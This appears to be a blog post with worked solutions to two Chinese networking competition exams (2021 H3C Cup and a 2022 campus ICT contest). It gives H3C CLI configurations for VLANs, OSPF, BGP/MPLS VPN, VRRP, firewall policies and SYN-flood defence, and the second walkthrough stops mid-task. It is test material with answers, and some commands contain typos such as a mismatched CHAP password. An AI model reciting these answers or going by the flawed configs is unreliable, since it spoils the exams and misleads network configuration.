2021年华三杯竞赛试题 2021年华三杯竞赛试题一、实验拓扑图二、需求本网络模拟一个大型企业网络，需要使用BGP/MPLS VPN技术来隔离不同的VPN,并使用防火墙来做到防攻击与访问策略。请考生根据以下配置需求在HCL中的设备上进行相关配置。PPP配置路由器R1与路由器R3间为广域网链路，使用PPP协议连通。PPP配置的具体要求如下：使用CHAP协议，并且为单向认证：R1作为认证方，R2作为被认证方：R1上配置本地AAA认证；用户名和密码均为123456。虚拟局域网为了减少广播，需要规划并配置VLAN。具体要求如下：配置合理，链路上不允许不必要的数据流通过。交换机与路由器间的互连物理端口直接使用三层模式互连。交换机(S1、S2、L2SW)间的互连端口链路类型为Trunk类型。根据上述信息及表1-1，在交换机上完成VLAN配置和端口分配。链路聚合在交换机S1和S2上配置链路聚合，要求使用二层静态链路聚合组，并设定组号为1；将接口G0/23与G0/24所在的链路聚合起来。MSTP部署在交换机S1、S2及L2SW上配置MSTP防止二层环路；所配置的参数要求如下：STP中的region-name为2021；其他相关要求见下表：IPv4地址部署VRRP部署在交换机S1、S2配置VRRP以提高可靠性，所配置的参数要求如下：S1作为VLAN10内主机的主用网关，S2作为VLAN20内主的主用网关，且互相备份：VRRP的主用优先级为150，备用优先级为110。IPv4IGP路由部署使用OSPF协议及静态路由互通。具体要求如下：R1、R2、R3之间运行OSPF;OSPF进程号为1，区域0；Router ID为本路由器的Loopback地址；R1与S1、S2之间运行OSPF;OSPF进程号为10，区域0：Router ID为本路由器的Loopback地址；S1、S2中的OSPF不允许将协议报文发送到业务网段中；要求OSPF及静态路由都发布具体网段(OSPF必须精确反掩码匹配)，不允许发布缺省路由；为了管理方便，OSPF需要发布Loopback地址，其中R1需要在OSPF进程1中发布。BGP/MPLS VPN部署各个路由器(R1、R2、R3)之间，以及R2与R4之间运行BGP协议。具体要求如下：R2与R4之间运行EBGP,R2属于AS100,R4属于AS300:R1、R2、R3之间运行IBGP,都属于AS100,并以Loopback地址作为互连的源地址：通过network命令方式生成BGP路由，而不允许通过import命令将IGP路由引入。R3与FW1、FW2之间运行静态VPN路由，并配置具体网段（不允许配置缺省路由）。配置两个VPN,并要求同一VPN内能够互访，不同VPN间不能互访。相关参数要求如下：MPLS的lsr-id使用Loopback地址，并使用LDP协议来进行标签分配。防火墙部署FW1、FW2上配置安全域和安全策略。具体要求如下：FWI、FW2与服务器互联接口处于Trust安全域，与R3接口处于Untrust安全域：FW1上配置地址对象组server1,并定义其主机地址为地址172.0.0.1/32；配置安全策略ap1,规则rule0,允许Untrust域中的客户端可以访问Trust域中目的地址为地址对象server1的所有P流量；FW2上配置地址对象组server2,并定义其主机地址为地址192.0.0.1/32；配置安全策略ap1,规则rule0,允许Untrust域中的客户端可以访问Trust.域中目的地址为地址对象server2的所有P流量；FW1、FW2上应用缺省IPS策略对用户数据报文进行IPS防御。具体要求如下：配置DPI应用profile,命名为sec,应用缺省IPS策略default并指定IPS策略模式为protect;在安全策略ap1上引用该sec;FW1、FW2上配置攻击防范策略。具体要求如下：FW1上配置攻击防范策略ad1,配置针对Sever1地址的SYN flood的攻击防范策略，阈值为2000，动作为丢弃并输出告警日志；在安全域Untrust上应用攻击防范策略ad1。FW2上配置攻击防范策略ad1,配置针对Sever2地址的SYNf1ood的攻击防范策略，阈值为2000，动作为丢弃并输出告警日志；在安全域Untrust上应用攻击防范策略ad1。IPv6部署在交换机S1、S2配置IPv6协议。要求使用OSPFv3协议，进程号为1，区域为0；Router ID与OSPF的Router ID相同。IPv6地址如下表所示：设备与网络管理部署根据表1-5，为网络设备配置主机名。三、实验步骤（一）配置ip地址如果你的拓扑图接口跟我一样那么就可以直接复制下面的命令R1sysname R1 interface gig 0/0 ip a 10.0.0.1 30 interface gig 0/1 ip a 10.0.0.5 30 interface gig 0/2 ip a 100.0.0.1 30 interface serial 1/0 ip a 100.0.0.10 30 interface loopback 0 ip a 9.9.9.1 32R2sysname R2 interface gig 0/0 ip a 100.0.0.2 30 interface gig 0/1 ip a 100.0.0.5 30 interface gig 0/2 ip a 10.0.0.9 30 interface l 0 ip a 9.9.9.2 32 R3sysname R3 interface gig 0/0 ip a 100.0.0.6 30 interface gig 0/1 ip a 10.0.0.13 30 interface gig 0/2 ip a 10.0.0.17 30 interface serial 1/0 ip a 100.0.0.9 30 interface loopback 0 ip a 9.9.9.3 32R4sysname R4 interface gi 0/0 ip a 10.0.0.10 30 interface gig 0/1 ip a 192.0.10.254 24 interface l 0 ip a 9.9.9.105 32S1sysname S1 interface gig 1/0/1 port link-mode route ip a 10.0.0.2 30 quit vlan 10 vlan 20 interface vlan 10 ip a 172.0.10.252 24 interface vlan 20 ip a 172.0.20.252 24 interface l 0 ip a 9.9.9.101 32S2sysname S2 interface gig 1/0/1 port link-mode route ip a 10.0.0.6 30 quit vlan 10 vlan 20 interface vlan 10 ip a 172.0.10.253 24 interface vlan 20 ip a 172.0.20.253 24 interface l 0 ip a 9.9.9.102 32FW1sysname FW1 interface gig 1/0/1 ip a 10.0.0.14 30 interface gig 1/0/0 ip a 172.0.0.254 24 interface l 0 ip a 9.9.9.201 32FW2sysname FW2 interface gig 1/0/1 ip a 10.0.0.18 30 interface gig 1/0/0 ip a 192.0.0.254 24 （二）ppp的配置R1[R1]local-user 123456 class network New local user added. [R1-luser-network-123456]password simple 123456 [R1-luser-network-123456]service-type ppp [R1-luser-network-123456]interface serial 1/0 [R1-Serial1/0]ppp aut chapR2[R2]interface serial 1/0 [R2-Serial1/0]ppp chap user 123456 [R2-Serial1/0]ppp chap password simple 1233456 [R2-Serial1/0]（三）链路聚合S1[S1]interface bridge 1 [S1-Bridge-Aggregation1]quit [S1]interface range gig 1/0/23 gig 1/0/24 [S1-if-range]port link-aggregation group 1S2[S2]interface bridge 1 [S2-Bridge-Aggregation1]quit [S2]interface range gig 1/0/23 gig 1/0/24 [S2-if-range]port link-aggregation group 1（四）vlan划分S1[S1]interface range bridge 1 gig 1/0/3 [S1-if-range]port link-type trunk Configuring GigabitEthernet1/0/23 done. Configuring GigabitEthernet1/0/24 done. [S1-if-range]port trunk permit vlan 10 20 S2[S2]interface range bridge 1 gig 1/0/3 [S2-if-range]port link-type trunk Configuring GigabitEthernet1/0/23 done. Configuring GigabitEthernet1/0/24 done. [S2-if-range]port trunk permit vlan 10 20 L2SW[L2SW]vlan 10 [L2SW-vlan10]port gig 1/0/1 to gig 1/0/4 [L2SW-vlan10]vlan 20 [L2SW-vlan20]port gig 1/0/5 to gig 1/0/8 [L2SW-vlan20]interface range gig 1/0/23 gig 1/0/24 [L2SW-if-range]port link-type trunk [L2SW-if-range]port trunk permit vlan 10 20（五）配置MSTPS1,S2,L2SWstp reg reg 2021 instance 1 vlan 10 instance 2 vlan 20 ac regS1[S1]stp instance 1 root pri [S1]stp instance 2 root secS2[S2]stp instance 1 root sec [S2]stp instance 2 root pri（六）配置vrrpS1[S1]interface vlan 10 [S1-Vlan-interface10]vrrp vrid 10 vir 172.0.10.254 [S1-Vlan-interface10]vrrp vrid 10 pri 150 [S1-Vlan-interface10]interface vlan 20 [S1-Vlan-interface20]vrrp vrid 20 pri 110 [S1-Vlan-interface20]vrrp vrid 20 vir 172.0.20.254 S2[S2]interface vlan 10 [S2-Vlan-interface10]vrrp vrid 10 vir 172.0.10.254 [S2-Vlan-interface10]vrrp vrid 10 pri 110 [S2-Vlan-interface10]interface vlan 20 [S2-Vlan-interface20]vrrp vrid 20 vir 172.0.20.254 [S2-Vlan-interface20]vrrp vrid 20 pri 150（七）配置ipv4 IGP路由R1[R1]ospf 1 router-id 9.9.9.1 [R1-ospf-1]area 0 [R1-ospf-1-area-0.0.0.0]network 9.9.9.1 0.0.0.0 [R1-ospf-1-area-0.0.0.0]network 100.0.0.1 0.0.0.3 [R1-ospf-1-area-0.0.0.0]network 100.0.0.10 0.0.0.3 R2[R2]ospf 1 router-id 9.9.9.2 [R2-ospf-1]area 0 [R2-ospf-1-area-0.0.0.0]network 9.9.9.2 0.0.0.0 [R2-ospf-1-area-0.0.0.0]network 100.0.0.2 0.0.0.3 [R2-ospf-1-area-0.0.0.0]network 100.0.0.5 0.0.0.3R3[R3]ospf 1 router-id 9.9.9.3 [R3-ospf-1]area 0 [R3-ospf-1-area-0.0.0.0]network 9.9.9.3 0.0.0.0 [R3-ospf-1-area-0.0.0.0]network 100.0.0.6 0.0.0.3 [R3-ospf-1-area-0.0.0.0]network 100.0.0.9 0.0.0.3R1[R1]ip vpn-instance vpn1 [R1-vpn-instance-vpn1]route-distinguisher 100:1 [R1-vpn-instance-vpn1]vpn-target 100:1 both [R1-vpn-instance-vpn1]quit [R1]interface gig 0/0 [R1-GigabitEthernet0/0]ip binding vpn-instance vpn1 Some configurations on the interface are removed. [R1-GigabitEthernet0/0] ip address 10.0.0.1 255.255.255.252 [R1-GigabitEthernet0/0]quit [R1]interface gig 0/1 [R1-GigabitEthernet0/1]ip bind vpn vpn1 Some configurations on the interface are removed. [R1-GigabitEthernet0/1] ip address 10.0.0.5 255.255.255.252 [R1]ospf 10 router-id 9.9.9.1 vpn-instance vpn1 [R1-ospf-10]area 0 [R1-ospf-10-area-0.0.0.0]network 10.0.0.0 0.0.0.3 [R1-ospf-10-area-0.0.0.0]network 10.0.4.0 0.0.0.3S1[S1]ospf 10 router-id 9.9.9.101 [S1-ospf-10]area 0 [S1-ospf-10]silent-interface vlan 10 [S1-ospf-10]silent-interface vlan 20 [S1-ospf-10-area-0.0.0.0]network 9.9.9.101 0.0.0.0 [S1-ospf-10-area-0.0.0.0]network 172.0.10.0 0.0.0.255 [S1-ospf-10-area-0.0.0.0]network 172.0.20.0 0.0.0.255 [S1-ospf-10-area-0.0.0.0]network 10.0.0.0 0.0.0.3S2[S2]ospf 10 router-id 9.9.9.102 [S2-ospf-10]area 0 [S2-ospf-10]silent-interface vlan 10 [S2-ospf-10]silent-interface vlan 20 [S2-ospf-10-area-0.0.0.0]network 10.0.0.4 0.0.0.3 [S2-ospf-10-area-0.0.0.0]network 9.9.9.102 0.0.0.0 [S2-ospf-10-area-0.0.0.0]network 172.0.10.0 0.0.0.255 [S2-ospf-10-area-0.0.0.0]network 172.0.20.0 0.0.0.255（八）防火墙的配置FW1[FW1]security-zone name Trust [FW1-security-zone-Trust]import interface gig 1/0/0 [FW1-security-zone-Trust]quit [FW1]security-zone name untrust [FW1-security-zone-Untrust]import interface gig 1/0/1 [FW1-security-zone-Untrust]quit [FW1]object-group ip address server1 [FW1-obj-grp-ip-server1]network host address 172.0.0.1 [FW1-obj-grp-ip-server1]quit [FW1]security-policy ip [FW1-security-policy-ip]rule 0 name ap1 [FW1-security-policy-ip-0-ap1]source-zone untrust [FW1-security-policy-ip-0-ap1]destination-zone trust [FW1-security-policy-ip-0-ap1]destination-ip server1 [FW1-security-policy-ip-0-ap1]action pass [FW1-security-policy-ip-0-ap1]quit [FW1-security-policy-ip]qu [FW1-app-profile-sec]ips apply policy default mode protect [FW1-app-profile-sec]quit [FW1]security-policy ip [FW1-security-policy-ip]rule 0 [FW1-security-policy-ip-0-ap1]profile sec [FW1-security-policy-ip-0-ap1]quit [FW1-security-policy-ip]quit [FW1]attack-defense policy ad1 [FW1-attack-defense-policy-ad1]syn-flood threshold 2000 [FW1-attack-defense-policy-ad1]syn-flood action logging drop [FW1-attack-defense-policy-ad1]syn-flood detect ip 172.0.0.1 [FW1-attack-defense-policy-ad1]quit [FW1]security-zone name Untrust [FW1-security-zone-Untrust]attack-defense apply policy ad1FW2[FW2]security-zone name trust [FW2-security-zone-Trust]import interface gig 1/0/0 [FW2-security-zone-Trust]quit [FW2]security-zone name untrust [FW2-security-zone-Untrust]import interface gig 1/0/1 [FW2-security-zone-Untrust]quit [FW2]object-group ip address server2 [FW2-obj-grp-ip-server2]network host address 192.0.0.1 [FW2-obj-grp-ip-server2]quit [FW2]security-policy ip [FW2-security-policy-ip]rule 0 name ap1 [FW2-security-policy-ip-0-ap1]source-zone untrust [FW2-security-policy-ip-0-ap1]destination-zone trust [FW2-security-policy-ip-0-ap1]destination-ip server2 [FW2-security-policy-ip-0-ap1]action pass [FW2-security-policy-ip-0-ap1]quit [FW2-security-policy-ip]quit [FW2]app-profile sec [FW2-app-profile-sec]ips apply policy default mode protect [FW2-app-profile-sec]quit [FW2]security-policy ip [FW2-security-policy-ip]rule 0 [FW2-security-policy-ip-0-ap1]profile sec [FW2-security-policy-ip-0-ap1]quit [FW2-security-policy-ip]quit [FW2]attack-defense policy ad1 [FW2-attack-defense-policy-ad1]syn-flood threshold 2000 [FW2-attack-defense-policy-ad1]syn-flood detect ip 192.0.0.1 [FW2-attack-defense-policy-ad1]syn-flood action logging drop [FW2-attack-defense-policy-ad1]quit [FW2]security-zone name untrust [FW2-security-zone-Untrust]attack-defense apply policy ad1（九）ipv6的部署S1[S1]interface vlan 10 [S1-Vlan-interface10]ipv6 address 172:10::254 64 [S1-Vlan-interface10]interface vlan 20 [S1-Vlan-interface20]ipv6 address 172:20::254 64 [S1-Vlan-interface20]ipv6 address 172:20::253 64 [S1-Vlan-interface20]undo ipv6 address 172:20::254 64 [S1-Vlan-interface20]interface loopback 0 [S1-LoopBack0]ipv6 address 9::101 128 [S1-LoopBack0]quit [S1]ospfv3 1 [S1-ospfv3-1]router-id 9.9.9.101 [S1-ospfv3-1]interface range vlan 10 vlan 20 [S1-if-range]ospfv3 1 area 0S2[S2]interface vlan 10 [S2-Vlan-interface10]ipv6 address 172:10::253 64 [S2-Vlan-interface10]interface vlan 20 [S2-Vlan-interface20]ipv6 address 172:20::254 64 [S2-Vlan-interface20]interface loopback 0 [S2-LoopBack0]ipv6 address 9::102 128 [S2-LoopBack0]quit [S2]ospfv3 1 [S2-ospfv3-1]router-id 9.9.9.102 [S2-ospfv3-1]interface range vlan 10 vlan 20 [S2-if-range]ospfv3 1 area 0（十）配置BGP/mpls VPNR4[R4]bgp 300 [R4-bgp-default]peer 10.0.0.9 as-number 100 [R4-bgp-default]address-family ipv4 [R4-bgp-default-ipv4]peer 10.0.0.9 enable [R4-bgp-default-ipv4]network 192.0.10.0 24R2[R2]ip vpn-instance vpn2 [R2-vpn-instance-vpn2]route-distinguisher 100:1 [R2-vpn-instance-vpn2]vpn-target 200:1 both [R2-vpn-instance-vpn2]quit [R2]interface gig 0/2 [R2-GigabitEthernet0/2]ip binding vpn-instance vpn2 Some configurations on the interface are removed. [R2-GigabitEthernet0/2] ip address 10.0.0.9 255.255.255.252 [R2-GigabitEthernet0/2]quit [R2]bgp 100 [R2-bgp-default]ip vpn-instance vpn2 [R2-bgp-default-vpn2]peer 10.0.0.10 as-number 300 [R2-bgp-default-vpn2]address-family ipv4 [R2-bgp-default-ipv4-vpn2]peer 10.0.0.10 enable [R2]mpls ldp [R2-ldp]lsr-id 9.9.9.2 [R2-ldp]interface range gig 0/0 gig 0/1 [R2-if-range]mpls enable [R2-if-range]mpls ldp enable [R2-if-range]quit [R2]bgp 100 [R2-bgp-default]group in [R2-bgp-default]peer 9.9.9.1 group in [R2-bgp-default]peer 9.9.9.3 group in [R2-bgp-default]peer in con loopback 0 [R2-bgp-default]address-family vpnv4 [R2-bgp-default-vpnv4]peer in enable R1[R1]mpls ldp [R1-ldp]lsr-id 9.9.9.1 [R1-ldp]interface range gig 0/2 serial 1/0 [R1-if-range]mpls enable [R1-if-range]mpls ldp enable [R1]bgp 100 [R1-bgp-default]group in [R1-bgp-default]peer 9.9.9.2 group in [R1-bgp-default]peer 9.9.9.3 group in [R1-bgp-default]peer in connect-interface loopback 0 [R1-bgp-default]address-family vpnv4 [R1-bgp-default-vpnv4]peer in enable [R1]bgp 100 [R1-bgp-default]ip vpn-instance vpn1 [R1-bgp-default-vpn1]address-family ipv4 [R1-bgp-default-ipv4-vpn1]network 172.0.10.0 24 [R1-bgp-default-ipv4-vpn1]network 172.0.20.0 24 [R1-bgp-default-ipv4-vpn1]quit [R1-bgp-default-vpn1]quit [R1-bgp-default]quit [R1]ospf 10 [R1-ospf-10]import bgpR3[R3]mpls ldp [R3-ldp]lsr-id 9.9.9.3 [R3-ldp]interface range serial 1/0 gig 0/0 [R3-if-range]mpls enable [R3-if-range]mpls ldp enable [R3-if-range]quit [R3]bgp 100 [R3-bgp-default]group in [R3-bgp-default]peer 9.9.9.1 group in [R3-bgp-default]peer 9.9.9.2 group in [R3-bgp-default]peer in connect-interface loopback 0 [R3-bgp-default]address-family vpnv4 [R3-bgp-default-vpnv4]peer in enable [R3]ip vpn-instance vpn1 [R3-vpn-instance-vpn1]route-distinguisher 100:1 [R3-vpn-instance-vpn1]vpn-target 100:1 both [R3-vpn-instance-vpn1]quit [R3]ip vpn-instance vpn2 [R3-vpn-instance-vpn2]route-distinguisher 200:1\ [R3-vpn-instance-vpn2]vpn-target 200:1 both [R3-vpn-instance-vpn2]quit [R3]interface gig 0/1 [R3-GigabitEthernet0/1]ip binding vpn-instance vpn1 Some configurations on the interface are removed. [R3-GigabitEthernet0/1] ip address 10.0.0.13 255.255.255.252 [R3-GigabitEthernet0/1]interface gig 0/2 [R3-GigabitEthernet0/2]ip binding vpn-instance vpn2 Some configurations on the interface are removed. [R3-GigabitEthernet0/2]ip a 10.0.0.17 30 [R3-GigabitEthernet0/2]quit [R3]ip route-static vpn-instance vpn1 172.0.0.0 24 10.0.0.14 [R3]ip route-static vpn-instance vpn2 192.0.0.0 24 10.0.0.18 [R3]bgp 100 [R3-bgp-default]ip vpn vpn1 [R3-bgp-default-vpn1]ad ipv4 [R3-bgp-default-ipv4-vpn1]network 172.0.0.0 24 [R3-bgp-default-ipv4-vpn1]quit [R3-bgp-default-vpn1]quit [R3-bgp-default]ip vpn vpn2 [R3-bgp-default-vpn2]ad ipv4 [R3-bgp-default-ipv4-vpn2]network 192.0.0.0 24FW1[FW1]ip route-static 172.0.10.0 24 10.0.0.13 [FW1]ip route-static 172.0.20.0 24 10.0.0.13FW2[FW2]ip route-static 192.0.10.0 24 10.0.0.17测试连通性S1 PING PC11[S1]ping -a 172.0.10.252 172.0.0.1 Ping 172.0.0.1 (172.0.0.1) from 172.0.10.252: 56 data bytes, press CTRL_C to break 56 bytes from 172.0.0.1: icmp_seq=0 ttl=252 time=3.000 ms 56 bytes from 172.0.0.1: icmp_seq=1 ttl=252 time=2.000 ms 56 bytes from 172.0.0.1: icmp_seq=2 ttl=252 time=3.000 ms 56 bytes from 172.0.0.1: icmp_seq=3 ttl=252 time=2.000 ms 56 bytes from 172.0.0.1: icmp_seq=4 ttl=252 time=1.000 ms --- Ping statistics for 172.0.0.1 --- 5 packet(s) transmitted, 5 packet(s) received, 0.0% packet loss round-trip min/avg/max/std-dev = 1.000/2.200/3.000/0.748 ms [S1]%Nov 19 14:52:47:811 2022 S1 PING/6/PING_STATISTICS: Ping statistics for 172.0.0.1: 5 packet(s) transmitted, 5 packet(s) received, 0.0% packet loss, round-trip min/avg/max/std-dev = 1.000/2.200/3.000/0.748 ms. [S1]ping -a 172.0.20.252 172.0.0.1 Ping 172.0.0.1 (172.0.0.1) from 172.0.20.252: 56 data bytes, press CTRL_C to break 56 bytes from 172.0.0.1: icmp_seq=0 ttl=252 time=3.000 ms 56 bytes from 172.0.0.1: icmp_seq=1 ttl=252 time=2.000 ms 56 bytes from 172.0.0.1: icmp_seq=2 ttl=252 time=2.000 ms 56 bytes from 172.0.0.1: icmp_seq=3 ttl=252 time=2.000 ms 56 bytes from 172.0.0.1: icmp_seq=4 ttl=252 time=2.000 ms --- Ping statistics for 172.0.0.1 --- 5 packet(s) transmitted, 5 packet(s) received, 0.0% packet loss round-trip min/avg/max/std-dev = 2.000/2.200/3.000/0.400 ms [S1]%Nov 19 14:52:57:002 2022 S1 PING/6/PING_STATISTICS: Ping statistics for 172.0.0.1: 5 packet(s) transmitted, 5 packet(s) received, 0.0% packet loss, round-trip min/avg/max/std-dev = 2.000/2.200/3.000/0.400 ms.PC10 PING PC12[PC10]ping -a 192.0.10.1 192.0.0.1 Ping 192.0.0.1 (192.0.0.1) from 192.0.10.1: 56 data bytes, press CTRL_C to break 56 bytes from 192.0.0.1: icmp_seq=0 ttl=251 time=3.000 ms 56 bytes from 192.0.0.1: icmp_seq=1 ttl=251 time=2.000 ms 56 bytes from 192.0.0.1: icmp_seq=2 ttl=251 time=2.000 ms 56 bytes from 192.0.0.1: icmp_seq=3 ttl=251 time=3.000 ms 56 bytes from 192.0.0.1: icmp_seq=4 ttl=251 time=2.000 ms --- Ping statistics for 192.0.0.1 --- 5 packet(s) transmitted, 5 packet(s) received, 0.0% packet loss round-trip min/avg/max/std-dev = 2.000/2.400/3.000/0.490 ms [H3C]%Nov 19 14:51:05:349 2022 H3C PING/6/PING_STATISTICS: Ping statistics for 192.0.0.1: 5 packet(s) transmitted, 5 packet(s) received, 0.0% packet loss, round-trip min/avg/max/std-dev = 2.000/2.400/3.000/0.490 ms.拓展这个实验如果你通过PC11和PC12去ping其他vpn网段，那么你会发现ping不通，这是因为防火墙策略没有允许放行，但是题目没有做要求，这里就是拓展一下而已[PC11]ping 172.0.10.252 Ping 172.0.10.252 (172.0.10.252): 56 data bytes, press CTRL_C to break Request time out Request time out Request time out Request time out Request time out --- Ping statistics for 172.0.10.252 --- 5 packet(s) transmitted, 0 packet(s) received, 100.0% packet loss [H3C]%Nov 19 14:54:26:179 2022 H3C PING/6/PING_STATISTICS: Ping statistics for 172.0.10.252: 5 packet(s) transmitted, 0 packet(s) received, 100.0% packet loss. 通过下面在防火墙放行区域，再次测试就可以ping通[FW1]security-policy ip [FW1-security-policy-ip]rule 0 [FW1-security-policy-ip-0-ap1]source-zone trust [FW1-security-policy-ip-0-ap1]destination-zone untrust [FW1]object-group ip address server1 [FW1-obj-grp-ip-server1]network subnet 172.0.10.0 24[PC11]ping 172.0.10.252 Ping 172.0.10.252 (172.0.10.252): 56 data bytes, press CTRL_C to break 56 bytes from 172.0.10.252: icmp_seq=0 ttl=252 time=3.000 ms 56 bytes from 172.0.10.252: icmp_seq=1 ttl=252 time=3.000 ms 56 bytes from 172.0.10.252: icmp_seq=2 ttl=252 time=3.000 ms 56 bytes from 172.0.10.252: icmp_seq=3 ttl=252 time=3.000 ms 56 bytes from 172.0.10.252: icmp_seq=4 ttl=252 time=2.000 ms --- Ping statistics for 172.0.10.252 --- 5 packet(s) transmitted, 5 packet(s) received, 0.0% packet loss round-trip min/avg/max/std-dev = 2.000/2.800/3.000/0.400 ms [H3C]%Nov 19 15:08:04:765 2022 H3C PING/6/PING_STATISTICS: Ping statistics for 172.0.10.252: 5 packet(s) transmitted, 5 packet(s) received, 0.0% packet loss, round-trip min/avg/max/std-dev = 2.000/2.800/3.000/0.400 ms. FW2也是一样这里就不演示了

校园ICT技能节比赛题目【2022.5】 介绍：本次实验拓扑以及需求都是根据真实项目进行修改而来；考虑到同学们的学习层次以及进度，对其中部分未涉及的地方进行删减和修改；项目： xxx规划【由于涉及到一些图片隐私的问题，本文此处进行了删减】实验拓扑：比赛要求：IP地址已经规划好，无需考虑IP地址配错问题；打开拓扑文件中的配置文件 rs.net 即可打开拓扑开始考试；在比赛时间内完成实验需求，并且写出实验文档，要求如下：命名规范19网安1-xxx 19云2-张三 19云3-李四格式以word文档的方式提交，按照每个实验要求，在每个要求下面写下自己的配置命令。拓扑介绍：PC7 , PC10属于技术部vlan10，PC8 , PC9属于财务部vlan20；SW1,SW2为接入层设备，负责局域网通讯，并且使用高可靠的方式互联；SW3为Vlan10和Vlan20的网关设备；SW3,R4,R5运行OSPF单域，并且R4，R5分别为联通电信的出口，保证网络的可靠性；其中R6为Inernet互联网设备。实验要求：局域网中存在 Vlan10和Vlan20 两个业务 VLAN，Vlan10 和 Vlan20IP 网段分别对应 192.168.1.0/24 和 192.168.2.0/24，请按需求划分Vlan。[SW1]vlan 10 [SW1‐vlan10] [[SW1‐vlan10]qu [SW1]vlan 20 [SW1‐vlan20]qu [SW1]interface GigabitEthernet 1/0/4 [SW1‐GigabitEthernet1/0/4]port link‐type access [SW1‐GigabitEthernet1/0/4]port access vlan 10 [SW1‐GigabitEthernet1/0/4]qu [SW1]interface GigabitEthernet 1/0/5 [SW1‐GigabitEthernet1/0/5]port link‐type access [SW1‐GigabitEthernet1/0/5]port access vlan 20[SW2]vlan 10 [SW2‐vlan10]qu [SW2]vlan 20 [SW2‐vlan20]qu [SW2]interface GigabitEthernet 1/0/4 [SW2‐GigabitEthernet1/0/4]port link‐type access [SW2‐GigabitEthernet1/0/4]port access vlan 20 [SW2‐GigabitEthernet1/0/4]qu [SW2]interface GigabitEthernet 1/0/5 [SW2‐GigabitEthernet1/0/5]port link‐type access [SW2‐GigabitEthernet1/0/5]port access vlan 10SW1 和 SW2 之间的直连链路上配置静态链路聚合实现链路冗余，提高链路带宽。[SW1]interface Bridge‐Aggregation 1 [SW1‐Bridge‐Aggregation1]qu [SW1]interface GigabitEthernet 1/0/2 [SW1‐GigabitEthernet1/0/2]port link‐aggregation group 1 [SW1‐GigabitEthernet1/0/2]qu [SW1]interface GigabitEthernet 1/0/3 [SW1‐GigabitEthernet1/0/3]port link‐aggregation group 1[SW2]interface Bridge‐Aggregation 1 [SW2‐Bridge‐Aggregation1]qu [SW2]interface GigabitEthernet 1/0/2 [SW2‐GigabitEthernet1/0/2]port link‐aggregation group 1 [SW2‐GigabitEthernet1/0/2]qu [SW2]interface GigabitEthernet 1/0/3 [SW2‐GigabitEthernet1/0/3]port link‐aggregation group 1所有交换机相连的端口配置为 Trunk，允许相关流量通过[SW1]interface Bridge‐Aggregation 1 [SW1‐Bridge‐Aggregation1]port link‐type trunk [SW1‐Bridge‐Aggregation1]port trunk permit vlan 10 20 [SW1‐Bridge‐Aggregation1]qu [SW1]interface GigabitEthernet 1/0/1 [SW1‐GigabitEthernet1/0/1]port link‐type trunk [SW1‐GigabitEthernet1/0/1]port trunk permit vlan 10 20[SW2]interface Bridge‐Aggregation 1 [SW2‐Bridge‐Aggregation1]port link‐type trunk [SW2‐Bridge‐Aggregation1]port trunk permit vlan 10 20 [SW2‐Bridge‐Aggregation1]qu [SW2]interface GigabitEthernet 1/0/1 [SW2‐GigabitEthernet1/0/1]port link‐type trunk [SW2‐GigabitEthernet1/0/1]port trunk permit vlan 10 20[SW3]interface GigabitEthernet 1/0/1 [SW3‐GigabitEthernet1/0/1]port link‐type trunk [SW3‐GigabitEthernet1/0/1]port trunk permit vlan 10 20 [SW3‐GigabitEthernet1/0/1]qu [SW3]interface GigabitEthernet 1/0/2 [SW3‐GigabitEthernet1/0/2]port link‐type trunk [SW3‐GigabitEthernet1/0/2]port trunk permit vlan 10 20SW1,SW2 和 SW3 运行的生成树版本为STP，并修改cost值，使阻塞端口在SW2的g0/1口上。[SW1]stp mode stp [SW1]display stp brief MST ID Port Role STP State Protection 0 Bridge‐Aggregation1 DESI FORWARDING NONE 0 GigabitEthernet1/0/1 DESI FORWARDING NONE 0 GigabitEthernet1/0/4 DESI FORWARDING NONE 0 GigabitEthernet1/0/5 DESI FORWARDING NONE[SW2]stp mode stp [SW2]display stp brief MST ID Port Role STP State Protection 0 Bridge‐Aggregation1 ROOT FORWARDING NONE 0 GigabitEthernet1/0/1 DESI FORWARDING NONE 0 GigabitEthernet1/0/4 DESI FORWARDING NONE 0 GigabitEthernet1/0/5 DESI FORWARDING NONE[SW3]stp mode stp [SW3]display stp brief MST ID Port Role STP State Protection 0 GigabitEthernet1/0/1 ROOT FORWARDING NONE 0 GigabitEthernet1/0/2 ALTE DISCARDING NONE 0 GigabitEthernet1/0/3 DESI FORWARDING NONE 0 GigabitEthernet1/0/4 DESI FORWARDING NONE//阻塞端口不符合要求，修改阻塞端口 [SW3]stp priority 0 [SW2]interface GigabitEthernet 1/0/1 [SW2‐GigabitEthernet1/0/1]stp cost 400按图在R4,R5和SW3 上配置OSPF单域，宣告业务网段使全网互通；其中SW3的Vlan100 和 Vlan200 分别是和R4, R5来建立OSPF邻居用的（15分）//划分端口，让三层接口UP [SW3]interface GigabitEthernet 1/0/3 [SW3‐GigabitEthernet1/0/3]port link‐type access [SW3‐GigabitEthernet1/0/3]port access vlan 100 [SW3‐GigabitEthernet1/0/3]qu [SW3]interface GigabitEthernet 1/0/4 [SW3‐GigabitEthernet1/0/4]port link‐type access [SW3‐GigabitEthernet1/0/4]port access vlan 200 //配置OSPF [SW3]ospf [SW3‐ospf‐1]area 0 [SW3‐ospf‐1‐area‐0.0.0.0]network 3.3.3.3 0.0.0.0 [SW3‐ospf‐1‐area‐0.0.0.0]network 100.0.11.0 0.0.0.3 [SW3‐ospf‐1‐area‐0.0.0.0]network 100.0.11.4 0.0.0.3 [SW3‐ospf‐1‐area‐0.0.0.0]network 192.168.1.0 0.0.0.255 [SW3‐ospf‐1‐area‐0.0.0.0]network 192.168.2.0 0.0.0.255[R4]ospf [R4‐ospf‐1]area 0 [R4‐ospf‐1‐area‐0.0.0.0]network 4.4.4.4 0.0.0.0 [R4‐ospf‐1‐area‐0.0.0.0]network 100.0.11.0 0.0.0.3 [R4‐ospf‐1‐area‐0.0.0.0]network 100.0.11.8 0.0.0.3[R5]ospf [R5‐ospf‐1]area 0 [R5‐ospf‐1‐area‐0.0.0.0]network 5.5.5.5 0.0.0.0 [R5‐ospf‐1‐area‐0.0.0.0]network 100.0.11.4 0.0.0.3 [R5‐ospf‐1‐area‐0.0.0.0]network 100.0.11.8 0.0.0.3业务网段不允许出现协议报文。（5分）[SW3‐ospf‐1]silent‐interface Vlan‐interface 10 [SW3‐ospf‐1]silent‐interface Vlan‐interface 20R4 ，R5 上配置默认路由指向互联网，并引入到 OSPF；并通过合适的方法使其实现主备，主链路为电信，备用链路为联通；只有当电信链路down后，数业务数据才会通过联通链路访问互联网。[R4]ip route‐static 0.0.0.0 0 200.1.1.2 preference 200 